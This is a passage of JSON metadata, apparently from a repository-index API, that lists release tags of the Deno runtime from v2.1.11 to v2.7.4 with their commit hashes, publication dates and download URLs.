at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/rep